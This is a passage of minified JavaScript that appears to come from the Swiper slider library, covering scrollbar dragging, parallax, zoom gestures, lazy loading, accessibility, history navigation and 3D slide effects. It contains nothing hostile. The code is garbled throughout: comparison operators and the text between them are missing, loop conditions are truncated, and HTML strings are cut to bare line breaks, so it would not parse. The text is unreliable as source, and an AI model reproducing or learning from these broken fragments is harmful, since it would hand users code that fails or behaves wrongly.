t=this,a=t.params.scrollbar,i=t.scrollbar,s=t.$wrapperEl,r=i.$el,n=i.$dragEl;t.scrollbar.isTouched=!0,t.scrollbar.dragStartPos=e.target===n[0]||e.target===n?i.getPointerPosition(e)-e.target.getBoundingClientRect()[t.isHorizontal()?"left":"top"]:null,e.preventDefault(),e.stopPropagation(),s.transition(100),n.transition(100),i.setDragPosition(e),clearTimeout(t.scrollbar.dragTimeout),r.transition(0),a.hide&&r.css("opacity",1),t.params.cssMode&&t.$wrapperEl.css("scroll-snap-type","none"),t.emit("scrollbarDragStart",e)},onDragMove:function(e){var t=this,a=t.scrollbar,i=t.$wrapperEl,s=a.$el,r=a.$dragEl;t.scrollbar.isTouched&&(e.preventDefault?e.preventDefault():e.returnValue=!1,a.setDragPosition(e),i.transition(0),s.transition(0),r.transition(0),t.emit("scrollbarDragMove",e))},onDragEnd:function(e){var t=this,a=t.params.scrollbar,i=t.scrollbar,s=t.$wrapperEl,r=i.$el;t.scrollbar.isTouched&&(t.scrollbar.isTouched=!1,t.params.cssMode&&(t.$wrapperEl.css("scroll-snap-type",""),s.transition("")),a.hide&&(clearTimeout(t.scrollbar.dragTimeout),t.scrollbar.dragTimeout=E((function(){r.css("opacity",0),r.transition(400)}),1e3)),t.emit("scrollbarDragEnd",e),a.snapOnRelease&&t.slideToClosest())},enableDraggable:function(){var e=this;if(e.params.scrollbar.el){var t=r(),a=e.scrollbar,i=e.touchEventsTouch,s=e.touchEventsDesktop,n=e.params,o=e.support,l=a.$el[0],d=!(!o.passiveListener||!n.passiveListeners)&&{passive:!1,capture:!1},p=!(!o.passiveListener||!n.passiveListeners)&&{passive:!0,capture:!1};l&&(o.touch?(l.addEventListener(i.start,e.scrollbar.onDragStart,d),l.addEventListener(i.move,e.scrollbar.onDragMove,d),l.addEventListener(i.end,e.scrollbar.onDragEnd,p)):(l.addEventListener(s.start,e.scrollbar.onDragStart,d),t.addEventListener(s.move,e.scrollbar.onDragMove,d),t.addEventListener(s.end,e.scrollbar.onDragEnd,p)))}},disableDraggable:function(){var e=this;if(e.params.scrollbar.el){var t=r(),a=e.scrollbar,i=e.touchEventsTouch,s=e.touchEventsDesktop,n=e.params,o=e.support,l=a.$el[0],d=!(!o.passiveListener||!n.passiveListeners)&&{passive:!1,capture:!1},p=!(!o.passiveListener||!n.passiveListeners)&&{passive:!0,capture:!1};l&&(o.touch?(l.removeEventListener(i.start,e.scrollbar.onDragStart,d),l.removeEventListener(i.move,e.scrollbar.onDragMove,d),l.removeEventListener(i.end,e.scrollbar.onDragEnd,p)):(l.removeEventListener(s.start,e.scrollbar.onDragStart,d),t.removeEventListener(s.move,e.scrollbar.onDragMove,d),t.removeEventListener(s.end,e.scrollbar.onDragEnd,p)))}},init:function(){var e=this;if(e.params.scrollbar.el){var t=e.scrollbar,a=e.$el,i=e.params.scrollbar,s=m(i.el);e.params.uniqueNavElements&&"string"==typeof i.el&&s.length>1&&1===a.find(i.el).length&&(s=a.find(i.el));var r=s.find("."+e.params.scrollbar.dragClass);0===r.length&&(r=m('
    '),s.append(r)),C(t,{$el:s,el:s[0],$dragEl:r,dragEl:r[0]}),i.draggable&&t.enableDraggable()}},destroy:function(){this.scrollbar.disableDraggable()}},ee={setTransform:function(e,t){var a=this.rtl,i=m(e),s=a?-1:1,r=i.attr("data-swiper-parallax")||"0",n=i.attr("data-swiper-parallax-x"),o=i.attr("data-swiper-parallax-y"),l=i.attr("data-swiper-parallax-scale"),d=i.attr("data-swiper-parallax-opacity");if(n||o?(n=n||"0",o=o||"0"):this.isHorizontal()?(n=r,o="0"):(o=r,n="0"),n=n.indexOf("%")>=0?parseInt(n,10)*t*s+"%":n*t*s+"px",o=o.indexOf("%")>=0?parseInt(o,10)*t+"%":o*t+"px",null!=d){var p=d-(d-1)*(1-Math.abs(t));i[0].style.opacity=p}if(null==l)i.transform("translate3d("+n+", "+o+", 0px)");else{var c=l-(l-1)*(1-Math.abs(t));i.transform("translate3d("+n+", "+o+", 0px) scale("+c+")")}},setTranslate:function(){var e=this,t=e.$el,a=e.slides,i=e.progress,s=e.snapGrid;t.children("[data-swiper-parallax], [data-swiper-parallax-x], [data-swiper-parallax-y], [data-swiper-parallax-opacity], [data-swiper-parallax-scale]").each((function(t){e.parallax.setTransform(t,i)})),a.each((function(t,a){var r=t.progress;e.params.slidesPerGroup>1&&"auto"!==e.params.slidesPerView&&(r+=Math.ceil(a/2)-i*(s.length-1)),r=Math.min(Math.max(r,-1),1),m(t).find("[data-swiper-parallax], [data-swiper-parallax-x], [data-swiper-parallax-y], [data-swiper-parallax-opacity], [data-swiper-parallax-scale]").each((function(t){e.parallax.setTransform(t,r)}))}))},setTransition:function(e){void 0===e&&(e=this.params.speed);this.$el.find("[data-swiper-parallax], [data-swiper-parallax-x], [data-swiper-parallax-y], [data-swiper-parallax-opacity], [data-swiper-parallax-scale]").each((function(t){var a=m(t),i=parseInt(a.attr("data-swiper-parallax-duration"),10)||e;0===e&&(i=0),a.transition(i)}))}},te={getDistanceBetweenTouches:function(e){if(e.targetTouches.length<2)return 1;var t=e.targetTouches[0].pageX,a=e.targetTouches[0].pageY,i=e.targetTouches[1].pageX,s=e.targetTouches[1].pageY;return Math.sqrt(Math.pow(i-t,2)+Math.pow(s-a,2))},onGestureStart:function(e){var t=this,a=t.support,i=t.params.zoom,s=t.zoom,r=s.gesture;if(s.fakeGestureTouched=!1,s.fakeGestureMoved=!1,!a.gestures){if("touchstart"!==e.type||"touchstart"===e.type&&e.targetTouches.length<2)return;s.fakeGestureTouched=!0,r.scaleStart=te.getDistanceBetweenTouches(e)}r.$slideEl&&r.$slideEl.length||(r.$slideEl=m(e.target).closest("."+t.params.slideClass),0===r.$slideEl.length&&(r.$slideEl=t.slides.eq(t.activeIndex)),r.$imageEl=r.$slideEl.find("img, svg, canvas, picture, .swiper-zoom-target"),r.$imageWrapEl=r.$imageEl.parent("."+i.containerClass),r.maxRatio=r.$imageWrapEl.attr("data-swiper-zoom")||i.maxRatio,0!==r.$imageWrapEl.length)?(r.$imageEl&&r.$imageEl.transition(0),t.zoom.isScaling=!0):r.$imageEl=void 0},onGestureChange:function(e){var t=this,a=t.support,i=t.params.zoom,s=t.zoom,r=s.gesture;if(!a.gestures){if("touchmove"!==e.type||"touchmove"===e.type&&e.targetTouches.length<2)return;s.fakeGestureMoved=!0,r.scaleMove=te.getDistanceBetweenTouches(e)}r.$imageEl&&0!==r.$imageEl.length?(a.gestures?s.scale=e.scale*s.currentScale:s.scale=r.scaleMove/r.scaleStart*s.currentScale,s.scale>r.maxRatio&&(s.scale=r.maxRatio-1+Math.pow(s.scale-r.maxRatio+1,.5)),s.scales.touchesStart.x))return void(s.isTouched=!1);if(!t.isHorizontal()&&(Math.floor(s.minY)===Math.floor(s.startY)&&s.touchesCurrent.ys.touchesStart.y))return void(s.isTouched=!1)}e.cancelable&&e.preventDefault(),e.stopPropagation(),s.isMoved=!0,s.currentX=s.touchesCurrent.x-s.touchesStart.x+s.startX,s.currentY=s.touchesCurrent.y-s.touchesStart.y+s.startY,s.currentXs.maxX&&(s.currentX=s.maxX-1+Math.pow(s.currentX-s.maxX+1,.8)),s.currentYs.maxY&&(s.currentY=s.maxY-1+Math.pow(s.currentY-s.maxY+1,.8)),r.prevPositionX||(r.prevPositionX=s.touchesCurrent.x),r.prevPositionY||(r.prevPositionY=s.touchesCurrent.y),r.prevTime||(r.prevTime=Date.now()),r.x=(s.touchesCurrent.x-r.prevPositionX)/(Date.now()-r.prevTime)/2,r.y=(s.touchesCurrent.y-r.prevPositionY)/(Date.now()-r.prevTime)/2,Math.abs(s.touchesCurrent.x-r.prevPositionX)<2&&(r.x=0),Math.abs(s.touchesCurrent.y-r.prevPositionY)<2&&(r.y=0),r.prevPositionX=s.touchesCurrent.x,r.prevPositionY=s.touchesCurrent.y,r.prevTime=Date.now(),i.$imageWrapEl.transform("translate3d("+s.currentX+"px, "+s.currentY+"px,0)")}}},onTouchEnd:function(){var e=this.zoom,t=e.gesture,a=e.image,i=e.velocity;if(t.$imageEl&&0!==t.$imageEl.length){if(!a.isTouched||!a.isMoved)return a.isTouched=!1,void(a.isMoved=!1);a.isTouched=!1,a.isMoved=!1;var s=300,r=300,n=i.x*s,o=a.currentX+n,l=i.y*r,d=a.currentY+l;0!==i.x&&(s=Math.abs((o-a.currentX)/i.x)),0!==i.y&&(r=Math.abs((d-a.currentY)/i.y));var p=Math.max(s,r);a.currentX=o,a.currentY=d;var c=a.width*e.scale,u=a.height*e.scale;a.minX=Math.min(t.slideWidth/2-c/2,0),a.maxX=-a.minX,a.minY=Math.min(t.slideHeight/2-u/2,0),a.maxY=-a.minY,a.currentX=Math.max(Math.min(a.currentX,a.maxX),a.minX),a.currentY=Math.max(Math.min(a.currentY,a.maxY),a.minY),t.$imageWrapEl.transition(p).transform("translate3d("+a.currentX+"px, "+a.currentY+"px,0)")}},onTransitionEnd:function(){var e=this,t=e.zoom,a=t.gesture;a.$slideEl&&e.previousIndex!==e.activeIndex&&(a.$imageEl&&a.$imageEl.transform("translate3d(0,0,0) scale(1)"),a.$imageWrapEl&&a.$imageWrapEl.transform("translate3d(0,0,0)"),t.scale=1,t.currentScale=1,a.$slideEl=void 0,a.$imageEl=void 0,a.$imageWrapEl=void 0)},toggle:function(e){var t=this.zoom;t.scale&&1!==t.scale?t.out():t.in(e)},in:function(e){var t,a,i,s,r,n,l,d,p,c,u,h,v,f,m,g,b=this,w=o(),y=b.zoom,E=b.params.zoom,x=y.gesture,T=y.image;(x.$slideEl||(b.params.virtual&&b.params.virtual.enabled&&b.virtual?x.$slideEl=b.$wrapperEl.children("."+b.params.slideActiveClass):x.$slideEl=b.slides.eq(b.activeIndex),x.$imageEl=x.$slideEl.find("img, svg, canvas, picture, .swiper-zoom-target"),x.$imageWrapEl=x.$imageEl.parent("."+E.containerClass)),x.$imageEl&&0!==x.$imageEl.length)&&(x.$slideEl.addClass(""+E.zoomedSlideClass),void 0===T.touchesStart.x&&e?(t="touchend"===e.type?e.changedTouches[0].pageX:e.pageX,a="touchend"===e.type?e.changedTouches[0].pageY:e.pageY):(t=T.touchesStart.x,a=T.touchesStart.y),y.scale=x.$imageWrapEl.attr("data-swiper-zoom")||E.maxRatio,y.currentScale=x.$imageWrapEl.attr("data-swiper-zoom")||E.maxRatio,e?(m=x.$slideEl[0].offsetWidth,g=x.$slideEl[0].offsetHeight,i=x.$slideEl.offset().left+w.scrollX+m/2-t,s=x.$slideEl.offset().top+w.scrollY+g/2-a,l=x.$imageEl[0].offsetWidth,d=x.$imageEl[0].offsetHeight,p=l*y.scale,c=d*y.scale,v=-(u=Math.min(m/2-p/2,0)),f=-(h=Math.min(g/2-c/2,0)),(r=i*y.scale)v&&(r=v),(n=s*y.scale)f&&(n=f)):(r=0,n=0),x.$imageWrapEl.transition(300).transform("translate3d("+r+"px, "+n+"px,0)"),x.$imageEl.transition(300).transform("translate3d(0,0,0) scale("+y.scale+")"))},out:function(){var e=this,t=e.zoom,a=e.params.zoom,i=t.gesture;i.$slideEl||(e.params.virtual&&e.params.virtual.enabled&&e.virtual?i.$slideEl=e.$wrapperEl.children("."+e.params.slideActiveClass):i.$slideEl=e.slides.eq(e.activeIndex),i.$imageEl=i.$slideEl.find("img, svg, canvas, picture, .swiper-zoom-target"),i.$imageWrapEl=i.$imageEl.parent("."+a.containerClass)),i.$imageEl&&0!==i.$imageEl.length&&(t.scale=1,t.currentScale=1,i.$imageWrapEl.transition(300).transform("translate3d(0,0,0)"),i.$imageEl.transition(300).transform("translate3d(0,0,0) scale(1)"),i.$slideEl.removeClass(""+a.zoomedSlideClass),i.$slideEl=void 0)},toggleGestures:function(e){var t=this,a=t.zoom,i=a.slideSelector,s=a.passiveListener;t.$wrapperEl[e]("gesturestart",i,a.onGestureStart,s),t.$wrapperEl[e]("gesturechange",i,a.onGestureChange,s),t.$wrapperEl[e]("gestureend",i,a.onGestureEnd,s)},enableGestures:function(){this.zoom.gesturesEnabled||(this.zoom.gesturesEnabled=!0,this.zoom.toggleGestures("on"))},disableGestures:function(){this.zoom.gesturesEnabled&&(this.zoom.gesturesEnabled=!1,this.zoom.toggleGestures("off"))},enable:function(){var e=this,t=e.support,a=e.zoom;if(!a.enabled){a.enabled=!0;var i=!("touchstart"!==e.touchEvents.start||!t.passiveListener||!e.params.passiveListeners)&&{passive:!0,capture:!1},s=!t.passiveListener||{passive:!1,capture:!0},r="."+e.params.slideClass;e.zoom.passiveListener=i,e.zoom.slideSelector=r,t.gestures?(e.$wrapperEl.on(e.touchEvents.start,e.zoom.enableGestures,i),e.$wrapperEl.on(e.touchEvents.end,e.zoom.disableGestures,i)):"touchstart"===e.touchEvents.start&&(e.$wrapperEl.on(e.touchEvents.start,r,a.onGestureStart,i),e.$wrapperEl.on(e.touchEvents.move,r,a.onGestureChange,s),e.$wrapperEl.on(e.touchEvents.end,r,a.onGestureEnd,i),e.touchEvents.cancel&&e.$wrapperEl.on(e.touchEvents.cancel,r,a.onGestureEnd,i)),e.$wrapperEl.on(e.touchEvents.move,"."+e.params.zoom.containerClass,a.onTouchMove,s)}},disable:function(){var e=this,t=e.zoom;if(t.enabled){var a=e.support;e.zoom.enabled=!1;var i=!("touchstart"!==e.touchEvents.start||!a.passiveListener||!e.params.passiveListeners)&&{passive:!0,capture:!1},s=!a.passiveListener||{passive:!1,capture:!0},r="."+e.params.slideClass;a.gestures?(e.$wrapperEl.off(e.touchEvents.start,e.zoom.enableGestures,i),e.$wrapperEl.off(e.touchEvents.end,e.zoom.disableGestures,i)):"touchstart"===e.touchEvents.start&&(e.$wrapperEl.off(e.touchEvents.start,r,t.onGestureStart,i),e.$wrapperEl.off(e.touchEvents.move,r,t.onGestureChange,s),e.$wrapperEl.off(e.touchEvents.end,r,t.onGestureEnd,i),e.touchEvents.cancel&&e.$wrapperEl.off(e.touchEvents.cancel,r,t.onGestureEnd,i)),e.$wrapperEl.off(e.touchEvents.move,"."+e.params.zoom.containerClass,t.onTouchMove,s)}}},ae={loadInSlide:function(e,t){void 0===t&&(t=!0);var a=this,i=a.params.lazy;if(void 0!==e&&0!==a.slides.length){var s=a.virtual&&a.params.virtual.enabled?a.$wrapperEl.children("."+a.params.slideClass+'[data-swiper-slide-index="'+e+'"]'):a.slides.eq(e),r=s.find("."+i.elementClass+":not(."+i.loadedClass+"):not(."+i.loadingClass+")");!s.hasClass(i.elementClass)||s.hasClass(i.loadedClass)||s.hasClass(i.loadingClass)||r.push(s[0]),0!==r.length&&r.each((function(e){var r=m(e);r.addClass(i.loadingClass);var n=r.attr("data-background"),o=r.attr("data-src"),l=r.attr("data-srcset"),d=r.attr("data-sizes"),p=r.parent("picture");a.loadImage(r[0],o||n,l,d,!1,(function(){if(null!=a&&a&&(!a||a.params)&&!a.destroyed){if(n?(r.css("background-image",'url("'+n+'")'),r.removeAttr("data-background")):(l&&(r.attr("srcset",l),r.removeAttr("data-srcset")),d&&(r.attr("sizes",d),r.removeAttr("data-sizes")),p.length&&p.children("source").each((function(e){var t=m(e);t.attr("data-srcset")&&(t.attr("srcset",t.attr("data-srcset")),t.removeAttr("data-srcset"))})),o&&(r.attr("src",o),r.removeAttr("data-src"))),r.addClass(i.loadedClass).removeClass(i.loadingClass),s.find("."+i.preloaderClass).remove(),a.params.loop&&t){var e=s.attr("data-swiper-slide-index");if(s.hasClass(a.params.slideDuplicateClass)){var c=a.$wrapperEl.children('[data-swiper-slide-index="'+e+'"]:not(.'+a.params.slideDuplicateClass+")");a.lazy.loadInSlide(c.index(),!1)}else{var u=a.$wrapperEl.children("."+a.params.slideDuplicateClass+'[data-swiper-slide-index="'+e+'"]');a.lazy.loadInSlide(u.index(),!1)}}a.emit("lazyImageReady",s[0],r[0]),a.params.autoHeight&&a.updateAutoHeight()}})),a.emit("lazyImageLoad",s[0],r[0])}))}},load:function(){var e=this,t=e.$wrapperEl,a=e.params,i=e.slides,s=e.activeIndex,r=e.virtual&&a.virtual.enabled,n=a.lazy,o=a.slidesPerView;function l(e){if(r){if(t.children("."+a.slideClass+'[data-swiper-slide-index="'+e+'"]').length)return!0}else if(i[e])return!0;return!1}function d(e){return r?m(e).attr("data-swiper-slide-index"):m(e).index()}if("auto"===o&&(o=0),e.lazy.initialImageLoaded||(e.lazy.initialImageLoaded=!0),e.params.watchSlidesVisibility)t.children("."+a.slideVisibleClass).each((function(t){var a=r?m(t).attr("data-swiper-slide-index"):m(t).index();e.lazy.loadInSlide(a)}));else if(o>1)for(var p=s;p1||n.loadPrevNextAmount&&n.loadPrevNextAmount>1){for(var c=n.loadPrevNextAmount,u=o,h=Math.min(s+u+Math.max(c,u),i.length),v=Math.max(s-Math.max(u,c),0),f=s+o;f0&&e.lazy.loadInSlide(d(b));var w=t.children("."+a.slidePrevClass);w.length>0&&e.lazy.loadInSlide(d(w))}},checkInViewOnLoad:function(){var e=o(),t=this;if(t&&!t.destroyed){var a=t.params.lazy.scrollingElement?m(t.params.lazy.scrollingElement):m(e),i=a[0]===e,s=i?e.innerWidth:a[0].offsetWidth,r=i?e.innerHeight:a[0].offsetHeight,n=t.$el.offset(),l=!1;t.rtlTranslate&&(n.left-=t.$el[0].scrollLeft);for(var d=[[n.left,n.top],[n.left+t.width,n.top],[n.left,n.top+t.height],[n.left+t.width,n.top+t.height]],p=0;p=0&&c[0]<=s&&c[1]>=0&&c[1]<=r){if(0===c[0]&&0===c[1])continue;l=!0}}l?(t.lazy.load(),a.off("scroll",t.lazy.checkInViewOnLoad)):t.lazy.scrollHandlerAttached||(t.lazy.scrollHandlerAttached=!0,a.on("scroll",t.lazy.checkInViewOnLoad))}}},ie={LinearSpline:function(e,t){var a,i,s,r,n,o=function(e,t){for(i=-1,a=e.length;a-i>1;)e[s=a+i>>1]<=t?i=s:a=s;return a};return this.x=e,this.y=t,this.lastIndex=e.length-1,this.interpolate=function(e){return e?(n=o(this.x,e),r=n-1,(e-this.x[r])*(this.y[n]-this.y[r])/(this.x[n]-this.x[r])+this.y[r]):0},this},getInterpolateFunction:function(e){var t=this;t.controller.spline||(t.controller.spline=t.params.loop?new ie.LinearSpline(t.slidesGrid,e.slidesGrid):new ie.LinearSpline(t.snapGrid,e.snapGrid))},setTranslate:function(e,t){var a,i,s=this,r=s.controller.control,n=s.constructor;function o(e){var t=s.rtlTranslate?-s.translate:s.translate;"slide"===s.params.controller.by&&(s.controller.getInterpolateFunction(e),i=-s.controller.spline.interpolate(-t)),i&&"container"!==s.params.controller.by||(a=(e.maxTranslate()-e.minTranslate())/(s.maxTranslate()-s.minTranslate()),i=(t-s.minTranslate())*a+e.minTranslate()),s.params.controller.inverse&&(i=e.maxTranslate()-i),e.updateProgress(i),e.setTranslate(i,s),e.updateActiveIndex(),e.updateSlidesClasses()}if(Array.isArray(r))for(var l=0;l0&&(e.isBeginning?(e.a11y.disableEl(i),e.a11y.makeElNotFocusable(i)):(e.a11y.enableEl(i),e.a11y.makeElFocusable(i))),a&&a.length>0&&(e.isEnd?(e.a11y.disableEl(a),e.a11y.makeElNotFocusable(a)):(e.a11y.enableEl(a),e.a11y.makeElFocusable(a)))}},updatePagination:function(){var e=this,t=e.params.a11y;e.pagination&&e.params.pagination.clickable&&e.pagination.bullets&&e.pagination.bullets.length&&e.pagination.bullets.each((function(a){var i=m(a);e.a11y.makeElFocusable(i),e.params.pagination.renderBullet||(e.a11y.addElRole(i,"button"),e.a11y.addElLabel(i,t.paginationBulletMessage.replace(/\{\{index\}\}/,i.index()+1)))}))},init:function(){var e=this,t=e.params.a11y;e.$el.append(e.a11y.liveRegion);var a=e.$el;t.containerRoleDescriptionMessage&&e.a11y.addElRoleDescription(a,t.containerRoleDescriptionMessage),t.containerMessage&&e.a11y.addElLabel(a,t.containerMessage);var i,s,r,n=e.$wrapperEl,o=n.attr("id")||"swiper-wrapper-"+e.a11y.getRandomNumber(16);e.a11y.addElId(n,o),i=e.params.autoplay&&e.params.autoplay.enabled?"off":"polite",e.a11y.addElLive(n,i),t.itemRoleDescriptionMessage&&e.a11y.addElRoleDescription(m(e.slides),t.itemRoleDescriptionMessage),e.a11y.addElRole(m(e.slides),t.slideRole),e.slides.each((function(a){var i=m(a),s=t.slideLabelMessage.replace(/\{\{index\}\}/,i.index()+1).replace(/\{\{slidesLength\}\}/,e.slides.length);e.a11y.addElLabel(i,s)})),e.navigation&&e.navigation.$nextEl&&(s=e.navigation.$nextEl),e.navigation&&e.navigation.$prevEl&&(r=e.navigation.$prevEl),s&&s.length&&(e.a11y.makeElFocusable(s),"BUTTON"!==s[0].tagName&&(e.a11y.addElRole(s,"button"),s.on("keydown",e.a11y.onEnterOrSpaceKey)),e.a11y.addElLabel(s,t.nextSlideMessage),e.a11y.addElControls(s,o)),r&&r.length&&(e.a11y.makeElFocusable(r),"BUTTON"!==r[0].tagName&&(e.a11y.addElRole(r,"button"),r.on("keydown",e.a11y.onEnterOrSpaceKey)),e.a11y.addElLabel(r,t.prevSlideMessage),e.a11y.addElControls(r,o)),e.pagination&&e.params.pagination.clickable&&e.pagination.bullets&&e.pagination.bullets.length&&e.pagination.$el.on("keydown",z(e.params.pagination.bulletClass),e.a11y.onEnterOrSpaceKey)},destroy:function(){var e,t,a=this;a.a11y.liveRegion&&a.a11y.liveRegion.length>0&&a.a11y.liveRegion.remove(),a.navigation&&a.navigation.$nextEl&&(e=a.navigation.$nextEl),a.navigation&&a.navigation.$prevEl&&(t=a.navigation.$prevEl),e&&e.off("keydown",a.a11y.onEnterOrSpaceKey),t&&t.off("keydown",a.a11y.onEnterOrSpaceKey),a.pagination&&a.params.pagination.clickable&&a.pagination.bullets&&a.pagination.bullets.length&&a.pagination.$el.off("keydown",z(a.params.pagination.bulletClass),a.a11y.onEnterOrSpaceKey)}},re={init:function(){var e=this,t=o();if(e.params.history){if(!t.history||!t.history.pushState)return e.params.history.enabled=!1,void(e.params.hashNavigation.enabled=!0);var a=e.history;a.initialized=!0,a.paths=re.getPathValues(e.params.url),(a.paths.key||a.paths.value)&&(a.scrollToSlide(0,a.paths.value,e.params.runCallbacksOnInit),e.params.history.replaceState||t.addEventListener("popstate",e.history.setHistoryPopState))}},destroy:function(){var e=o();this.params.history.replaceState||e.removeEventListener("popstate",this.history.setHistoryPopState)},setHistoryPopState:function(){var e=this;e.history.paths=re.getPathValues(e.params.url),e.history.scrollToSlide(e.params.speed,e.history.paths.value,!1)},getPathValues:function(e){var t=o(),a=(e?new URL(e):t.location).pathname.slice(1).split("/").filter((function(e){return""!==e})),i=a.length;return{key:a[i-2],value:a[i-1]}},setHistory:function(e,t){var a=this,i=o();if(a.history.initialized&&a.params.history.enabled){var s;s=a.params.url?new URL(a.params.url):i.location;var r=a.slides.eq(t),n=re.slugify(r.attr("data-history"));if(a.params.history.root.length>0){var l=a.params.history.root;"/"===l[l.length-1]&&(l=l.slice(0,l.length-1)),n=l+"/"+e+"/"+n}else s.pathname.includes(e)||(n=e+"/"+n);var d=i.history.state;d&&d.value===n||(a.params.history.replaceState?i.history.replaceState({value:n},null,n):i.history.pushState({value:n},null,n))}},slugify:function(e){return e.toString().replace(/\s+/g,"-").replace(/[^\w-]+/g,"").replace(/--+/g,"-").replace(/^-+/,"").replace(/-+$/,"")},scrollToSlide:function(e,t,a){var i=this;if(t)for(var s=0,r=i.slides.length;s
    '),i.append(e)),e.css({height:r+"px"})):0===(e=a.find(".swiper-cube-shadow")).length&&(e=m('
    '),a.append(e)));for(var v=0;v-1&&(h=90*g+90*y,o&&(h=90*-g-90*y)),f.transform(S),p.slideShadows){var C=c?f.find(".swiper-slide-shadow-left"):f.find(".swiper-slide-shadow-top"),M=c?f.find(".swiper-slide-shadow-right"):f.find(".swiper-slide-shadow-bottom");0===C.length&&(C=m('
    '),f.append(C)),0===M.length&&(M=m('
    '),f.append(M)),C.length&&(C[0].style.opacity=Math.max(-y,0)),M.length&&(M[0].style.opacity=Math.max(y,0))}}if(i.css({"-webkit-transform-origin":"50% 50% -"+l/2+"px","-moz-transform-origin":"50% 50% -"+l/2+"px","-ms-transform-origin":"50% 50% -"+l/2+"px","transform-origin":"50% 50% -"+l/2+"px"}),p.shadow)if(c)e.transform("translate3d(0px, "+(r/2+p.shadowOffset)+"px, "+-r/2+"px) rotateX(90deg) rotateZ(0deg) scale("+p.shadowScale+")");else{var z=Math.abs(h)-90*Math.floor(Math.abs(h)/90),P=1.5-(Math.sin(2*z*Math.PI/360)/2+Math.cos(2*z*Math.PI/360)/2),k=p.shadowScale,L=p.shadowScale/P,$=p.shadowOffset;e.transform("scale3d("+k+", 1, "+L+") translate3d(0px, "+(n/2+$)+"px, "+-n/2/L+"px) rotateX(-90deg)")}var I=d.isSafari||d.isWebView?-l/2:0;i.transform("translate3d(0px,0,"+I+"px) rotateX("+(t.isHorizontal()?0:h)+"deg) rotateY("+(t.isHorizontal()?-h:0)+"deg)")},setTransition:function(e){var t=this,a=t.$el;t.slides.transition(e).find(".swiper-slide-shadow-top, .swiper-slide-shadow-right, .swiper-slide-shadow-bottom, .swiper-slide-shadow-left").transition(e),t.params.cubeEffect.shadow&&!t.isHorizontal()&&a.find(".swiper-cube-shadow").transition(e)}},pe={setTranslate:function(){for(var e=this,t=e.slides,a=e.rtlTranslate,i=0;i'),s.append(p)),0===c.length&&(c=m('
    '),s.append(c)),p.length&&(p[0].style.opacity=Math.max(-r,0)),c.length&&(c[0].style.opacity=Math.max(r,0))}s.transform("translate3d("+l+"px, "+d+"px, 0px) rotateX("+o+"deg) rotateY("+n+"deg)")}},setTransition:function(e){var t=this,a=t.slides,i=t.activeIndex,s=t.$wrapperEl;if(a.transition(e).find(".swiper-slide-shadow-top, .swiper-slide-shadow-right, .swiper-slide-shadow-bottom, .swiper-slide-shadow-left").transition(e),t.params.virtualTranslate&&0!==e){var r=!1;a.eq(i).transitionEnd((function(){if(!r&&t&&!t.destroyed){r=!0,t.animating=!1;for(var e=["webkitTransitionEnd","transitionend"],a=0;a'),h.append(C)),0===M.length&&(M=m('
    '),h.append(M)),C.length&&(C[0].style.opacity=f>0?f:0),M.length&&(M[0].style.opacity=-f>0?-f:0)}}},setTransition:function(e){this.slides.transition(e).find(".swiper-slide-shadow-top, .swiper-slide-shadow-right, .swiper-slide-shadow-bottom, .swiper-slide-shadow-left").transition(e)}},ue={init:function(){var e=this,t=e.params.thumbs;if(e.thumbs.initialized)return!1;e.thumbs.initialized=!0;var a=e.constructor;return t.swiper instanceof a?(e.thumbs.swiper=t.swiper,C(e.thumbs.swiper.originalParams,{watchSlidesProgress:!0,slideToClickedSlide:!1}),C(e.thumbs.swiper.params,{watchSlidesProgress:!0,slideToClickedSlide:!1})):S(t.swiper)&&(e.thumbs.swiper=new a(C({},t.swiper,{watchSlidesVisibility:!0,watchSlidesProgress:!0,slideToClickedSlide:!1})),e.thumbs.swiperCreated=!0),e.thumbs.swiper.$el.addClass(e.params.thumbs.thumbsContainerClass),e.thumbs.swiper.on("tap",e.thumbs.onThumbClick),!0},onThumbClick:function(){var e=this,t=e.thumbs.swiper;if(t){var a=t.clickedIndex,i=t.clickedSlide;if(!(i&&m(i).hasClass(e.params.thumbs.slideThumbActiveClass)||null==a)){var s;if(s=t.params.loop?parseInt(m(t.clickedSlide).attr("data-swiper-slide-index"),10):a,e.params.loop){var r=e.activeIndex;e.slides.eq(r).hasClass(e.params.slideDuplicateClass)&&(e.loopFix(),e._clientLeft=e.$wrapperEl[0].clientLeft,r=e.activeIndex);var n=e.slides.eq(r).prevAll('[data-swiper-slide-index="'+s+'"]').eq(0).index(),o=e.slides.eq(r).nextAll('[data-swiper-slide-index="'+s+'"]').eq(0).index();s=void 0===n?o:void 0===o?n:o-rt.previousIndex?"next":"prev"}else o=(n=t.realIndex)>t.previousIndex?"next":"prev";r&&(n+="next"===o?s:-1*s),a.visibleSlidesIndexes&&a.visibleSlidesIndexes.indexOf(n)<0&&(a.params.centeredSlides?n=n>l?n-Math.floor(i/2)+1:n+Math.floor(i/2)-1:n>l&&(n=n-i+1),a.slideTo(n,e?0:void 0))}var c=1,u=t.params.thumbs.slideThumbActiveClass;if(t.params.slidesPerView>1&&!t.params.centeredSlides&&(c=t.params.slidesPerView),t.params.thumbs.multipleActiveThumbs||(c=1),c=Math.floor(c),a.slides.removeClass(u),a.params.loop||a.params.virtual&&a.params.virtual.enabled)for(var h=0;h0&&!m(a).hasClass(e.params.pagination.bulletClass)){if(e.navigation&&(e.navigation.nextEl&&a===e.navigation.nextEl||e.navigation.prevEl&&a===e.navigation.prevEl))return;!0===e.pagination.$el.hasClass(e.params.pagination.hiddenClass)?e.emit("paginationShow"):e.emit("paginationHide"),e.pagination.$el.toggleClass(e.params.pagination.hiddenClass)}}}},{name:"scrollbar",params:{scrollbar:{el:null,dragSize:"auto",hide:!1,draggable:!1,snapOnRelease:!0,lockClass:"swiper-scrollbar-lock",dragClass:"swiper-scrollbar-drag"}},create:function(){M(this,{scrollbar:t({isTouched:!1,timeout:null,dragTimeout:null},Q)})},on:{init:function(e){e.scrollbar.init(),e.scrollbar.updateSize(),e.scrollbar.setTranslate()},update:function(e){e.scrollbar.updateSize()},resize:function(e){e.scrollbar.updateSize()},observerUpdate:function(e){e.scrollbar.updateSize()},setTranslate:function(e){e.scrollbar.setTranslate()},setTransition:function(e,t){e.scrollbar.setTransition(t)},destroy:function(e){e.scrollbar.destroy()}}},{name:"parallax",params:{parallax:{enabled:!1}},create:function(){M(this,{parallax:t({},ee)})},on:{beforeInit:function(e){e.params.parallax.enabled&&(e.params.watchSlidesProgress=!0,e.originalParams.watchSlidesProgress=!0)},init:function(e){e.params.parallax.enabled&&e.parallax.setTranslate()},setTranslate:function(e){e.params.parallax.enabled&&e.parallax.setTranslate()},setTransition:function(e,t){e